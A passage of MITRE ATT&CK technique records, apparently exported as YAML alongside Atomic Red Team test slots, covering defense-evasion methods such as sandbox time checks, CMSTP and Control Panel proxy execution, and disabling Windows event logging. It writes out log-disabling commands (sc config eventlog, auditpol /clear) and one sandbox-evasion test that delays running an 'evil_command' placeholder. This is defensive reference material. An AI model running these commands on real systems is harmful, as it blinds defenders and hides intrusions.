If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023) Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Manikantan Srinivasan, NEC Corporation India - Pooja Natarajan, NEC Corporation India - Nagahama Hiroki – NEC Corporation Japan x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.0' atomic_tests: [] T1564.011: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b created: '2023-08-24T17:23:34.470Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1564/011 external_id: T1564.011 - source_name: Linux Signal Man description: Linux man-pages. (2023, April 3). signal(7). Retrieved August 30, 2023. url: https://man7.org/linux/man-pages/man7/signal.7.html - source_name: nohup Linux Man description: Meyering, J. (n.d.). nohup(1). Retrieved August 30, 2023. url: https://linux.die.net/man/1/nohup - source_name: Microsoft PowerShell SilentlyContinue description: Microsoft. (2023, March 2). $DebugPreference. Retrieved August 30, 2023. 
url: https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_preference_variables?view=powershell-7.3#debugpreference object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T22:41:11.807Z' name: Ignore Process Interrupts description: "Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.(Citation: Linux Signal Man) \ These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes. \n\nAdversaries may invoke processes using `nohup`, [PowerShell](https://attack.mitre.org/techniques/T1059/001) `-ErrorAction SilentlyContinue`, or similar commands that may be immune to hangups.(Citation: nohup Linux Man)(Citation: Microsoft PowerShell SilentlyContinue) This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.\n\nHiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://attack.mitre.org/techniques/T1546/005) this does not establish [Persistence](https://attack.mitre.org/tactics/TA0003) since the process will not be re-invoked once actually terminated." 
kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Viren Chaudhari, Qualys x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.0' atomic_tests: [] T1497.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0 created: '2020-03-06T21:11:11.225Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1497/003 external_id: T1497.003 - source_name: ISACA Malware Tricks description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.' url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:44.870Z' name: Time Based Evasion description: "Adversaries may employ various time-based methods to detect virtualization and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. This may include enumerating time-based properties, such as uptime or the system clock. 
\n\nAdversaries may use calls like `GetTickCount` and `GetSystemTimeAsFileTime` to discover if they are operating within a virtual machine or sandbox, or may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: discovery x_mitre_attack_spec_version: 3.3.0 x_mitre_contributors: - Jorge Orchilles, SCYTHE - Ruben Dodge, @shotgunner101 - Jeff Felling, Red Canary - Deloitte Threat Library Team x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '2.0' identifier: T1497.003 atomic_tests: - name: Delay execution with ping auto_generated_guid: 8b87dd03-8204-478c-bac3-3959f6528de3 description: 'Uses the ping command to introduce a delay before executing a malicious payload. ' supported_platforms: - linux - macos input_arguments: evil_command: description: Command to run after the delay type: string default: whoami ping_count: description: Number of ping requests to send (higher counts increase the delay) type: integer default: 250 executor: command: | ping -c #{ping_count} 8.8.8.8 > /dev/null #{evil_command} name: sh T1218.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49 created: '2020-01-23T18:27:30.656Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/003 external_id: T1218.003 - source_name: Twitter CMSTP Usage Jan 2018 description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe... 
Retrieved September 12, 2024. url: https://x.com/ItsReallyNick/status/958789644165894146 - source_name: Microsoft Connection Manager Oct 2009 description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018. url: https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10) - source_name: MSitPros CMSTP Aug 2017 description: Moe, O. (2017, August 15). Research on CMSTP.exe. Retrieved April 11, 2018. url: https://msitpros.com/?p=3960 - source_name: GitHub Ultimate AppLocker Bypass List description: Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018. url: https://github.com/api0cradle/UltimateAppLockerByPassList - source_name: Endurant CMSTP July 2018 description: Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved November 17, 2024. url: https://web.archive.org/web/20190316220149/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ - source_name: Twitter CMSTP Jan 2018 description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved September 12, 2024. url: https://x.com/NickTyrer/status/958450014111633408 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:45.149Z' name: 'Signed Binary Proxy Execution: CMSTP' description: |- Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands. 
(Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft. CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Nik Seetharaman, Palantir - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.2' identifier: T1218.003 atomic_tests: [] T1562.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a created: '2020-02-21T20:46:36.688Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1562/002 external_id: T1562.002 - source_name: Disable_Win_Event_Logging description: " dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021." 
url: https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging - source_name: def_ev_win_event_logging description: 'Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.' url: https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ - source_name: EventLog_Core_Technologies description: 'Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.' url: https://www.coretechnologies.com/blog/windows-services/eventlog/ - source_name: Audit_Policy_Microsoft description: Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021. url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy - source_name: Windows Log Events description: Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020. url: https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/ - source_name: disable_win_evt_logging description: 'Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.' url: https://ptylu.github.io/content/report/report.html?report=25 - source_name: auditpol description: Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021. url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol - source_name: winser19_file_overwrite_bug_twitter description: Naceri, A. (2021, November 7). Windows Server 2019 file overwrite bug. Retrieved April 7, 2022. url: https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040 - source_name: T1562.002_redcanaryco description: redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021. 
url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md - source_name: Advanced_sec_audit_policy_settings description: Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021. url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings - source_name: auditpol.exe_STRONTIC description: STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021. url: https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html - source_name: evt_log_tampering description: 'svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.' url: https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:45.425Z' name: 'Impair Defenses: Disable Windows Event Logging' description: |- Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections. The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. 
Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\Local Policies\Audit Policy for basic audit policy settings or Security Settings\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol) Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the Set-Service -Name EventLog -Status Stopped or sc config eventlog start=disabled commands (followed by manually stopping the service using Stop-Service -Name EventLog).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the “Start” value in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog then restarting the system for the change to take effect.(Citation: disable_win_evt_logging) There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System and HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application to disable the entire EventLog.(Citation: disable_win_evt_logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. 
For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco) By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team - Lucas Heiligenstein x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.4' identifier: T1562.002 atomic_tests: [] T1218.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f created: '2020-01-23T19:59:52.630Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/002 external_id: T1218.002 - source_name: Microsoft Implementing CPL description: M. (n.d.). Implementing Control Panel Items. Retrieved January 18, 2018. url: https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx - source_name: TrendMicro CPL Malware Jan 2014 description: Mercês, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018. url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf - source_name: TrendMicro CPL Malware Dec 2013 description: Bernardino, J. (2013, December 17). Control Panel Files Used As Malicious Attachments. Retrieved January 18, 2018. 
url: https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/ - source_name: Palo Alto Reaver Nov 2017 description: Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017. url: https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/ - source_name: ESET InvisiMole June 2020 description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.' url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:45.979Z' name: 'Signed Binary Proxy Execution: Control Panel' description: |- Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. 
Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists. Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. 
CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - ESET x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.1' identifier: T1218.002 atomic_tests: [] T1599.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de created: '2020-10-19T16:48:08.241Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1599/001 external_id: T1599.001 - source_name: RFC1918 description: IETF Network Working Group. (1996, February). Address Allocation for Private Internets. Retrieved October 20, 2020. url: https://tools.ietf.org/html/rfc1918 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:46.071Z' name: Network Address Translation Traversal description: "Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. 
A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen an adversary gains control of a network boundary device, they may modify NAT configurations to send traffic between two separated networks, or to obscure their activities. In network designs that require NAT to function, such modifications enable the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In network designs that do not require NAT, adversaries may use address translation to further obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders. \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities." kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.3.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Network Devices x_mitre_version: '1.2' atomic_tests: [] T1036.011: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--514dc7b3-0b80-4382-80a9-2e2d294f5019 created: '2025-03-27T20:37:52.269Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1036/011 external_id: T1036.011 - source_name: Microsoft XorDdos Linux Stealth 2022 description: 'Ratnesh Pandey, Yevgeny Kulakov, and Jonathan Bar Or with Saurabh Swaroop. (2022, May 19). 
Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices. Retrieved September 27, 2023.' url: https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/ - source_name: Sandfly BPFDoor 2022 description: The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive Linux Backdoor Technical Analysis. Retrieved September 29, 2023. url: https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T19:58:30.391Z' name: Overwrite Process Arguments description: "Adversaries may modify a process's in-memory arguments to change its name in order to appear as a legitimate or benign process. On Linux, the operating system stores command-line arguments in the process’s stack and passes them to the `main()` function as the `argv` array. The first element, `argv[0]`, typically contains the process name or path - by default, the command used to actually start the process (e.g., `cat /etc/passwd`). By default, the Linux `/proc` filesystem uses this value to represent the process name. The `/proc//cmdline` file reflects the contents of this memory, and tools like `ps` use it to display process information. Since arguments are stored in user-space memory at launch, this modification can be performed without elevated privileges. \n\nDuring runtime, adversaries can erase the memory used by all command-line arguments for a process, overwriting each argument string with null bytes. This removes evidence of how the process was originally launched. They can then write a spoofed string into the memory region previously occupied by `argv[0]` to mimic a benign command, such as `cat resolv.conf`. 
The new command-line string is reflected in `/proc//cmdline` and displayed by tools like `ps`.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux x_mitre_version: '1.0' atomic_tests: [] T1550: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814 created: '2020-01-30T16:18:36.873Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1550 external_id: T1550 - source_name: TechNet Audit Policy description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. url: https://technet.microsoft.com/en-us/library/dn487457.aspx - source_name: NIST Authentication description: NIST. (n.d.). Authentication. Retrieved January 30, 2020. url: https://csrc.nist.gov/glossary/term/authentication - source_name: NIST MFA description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September 25, 2024. url: https://csrc.nist.gov/glossary/term/multi_factor_authentication object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:46.684Z' name: Use Alternate Authentication Material description: "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. 
\n\nAuthentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)\n\nCaching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.\n" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Blake Strom, Microsoft Threat Intelligence - Pawel Partyka, Microsoft Threat Intelligence x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - SaaS - IaaS - Containers - Identity Provider - Office Suite - Linux x_mitre_version: '1.5' atomic_tests: [] T1562.004: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b created: '2020-02-21T21:00:48.814Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false 
external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1562/004 external_id: T1562.004 - source_name: Broadcom ESXi Firewall description: Broadcom. (2025, March 24). Add Allowed IP Addresses for an ESXi Host by Using the VMware Host Client. Retrieved March 26, 2025. url: https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/add-allowed-ip-addresses-for-an-esxi-host-by-using-the-vmware-host-client.html - source_name: Huntress BlackCat description: Carvey, H. (2024, February 28). BlackCat Ransomware Affiliate TTPs. Retrieved March 27, 2024. url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps - source_name: Trellix Rnasomhouse 2024 description: Pham Duy Phuc, Max Kersten, Noël Keijzer, and Michaël Schrijver. (2024, February 14). RansomHouse am See. Retrieved March 26, 2025. url: https://www.trellix.com/en-au/blogs/research/ransomhouse-am-see/ - source_name: change_rdp_port_conti description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks. Retrieved September 12, 2024.' url: https://x.com/TheDFIRReport/status/1498657772254240768 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:47.755Z' name: 'Impair Defenses: Disable or Modify System Firewall' description: |- Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel. Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. 
For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti) Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules. In ESXi, firewall rules may be modified directly via the esxcli command line interface (e.g., via `esxcli network firewall set`) or via the vCenter user interface.(Citation: Trellix Rnasomhouse 2024)(Citation: Broadcom ESXi Firewall) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - ESXi - Linux - macOS - Network Devices - Windows x_mitre_version: '1.3' identifier: T1562.004 atomic_tests: [] T1553.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc created: '2020-02-05T19:34:04.910Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1553/003 external_id: T1553.003 - source_name: Entrust Enable CAPI2 Aug 2017 description: Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018. url: http://www.entrust.net/knowledge-base/technote.cfm?tn=8165 - source_name: GitHub SIP POC Sept 2017 description: Graeber, M. (2017, September 14). 
PoCSubjectInterfacePackage. Retrieved January 31, 2018. url: https://github.com/mattifestation/PoCSubjectInterfacePackage - source_name: SpectorOps Subverting Trust Sept 2017 description: Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018. url: https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf - source_name: Microsoft Catalog Files and Signatures April 2017 description: Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018. url: https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files - source_name: Microsoft Audit Registry July 2012 description: Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018. url: https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10) - source_name: Microsoft Registry Auditing Aug 2016 description: Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018. url: https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11) - source_name: Microsoft Authenticode description: Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018. url: https://msdn.microsoft.com/library/ms537359.aspx - source_name: Microsoft WinVerifyTrust description: Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018. url: https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx - source_name: EduardosBlog SIPs July 2008 description: Navarro, E. (2008, July 11). SIP’s (Subject Interface Package) and Authenticode. 